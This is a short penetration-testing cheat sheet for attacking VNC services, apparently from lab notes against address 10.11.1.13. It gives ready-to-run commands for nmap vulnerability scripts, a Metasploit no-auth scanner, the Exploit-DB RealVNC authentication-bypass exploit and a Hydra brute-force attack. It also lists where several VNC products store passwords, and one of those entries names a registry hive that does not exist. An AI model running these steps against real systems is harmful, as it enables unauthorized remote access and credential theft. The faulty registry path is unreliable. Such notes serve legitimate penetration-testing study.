VNC 5800 5900
1. Nmap - VNC Information and Vulnerability Scanning:
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5800 10.11.1.13
2. Metasploit - RealVNC Authentication Bypass
use auxiliary/scanner/vnc/vnc_none_auth
set rhosts 10.11.1.13
set rport 5800
set threads 1
run
3. RealVNC Authentication Bypass (Exploit):
sudo searchsploit -m windows/remote/36932.py
python2 36932.py #input target IP
4. Hydra - Brute-forcing VNC
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV
5. Password Default Locations
Linux (TightVNC/other): Default password is stored in:
~/.vnc/passwd
Windows - RealVNC: VNC password can be found in:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Windows - TightVNC: Password in:
HKEY_CURRENT_USER\Software\TightVNC\Server
Windows - TigerVNC: Stored in:
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Windows - UltraVNC: VNC credentials stored in:
C:\Program Files\UltraVNC\ultravnc.ini
Last updated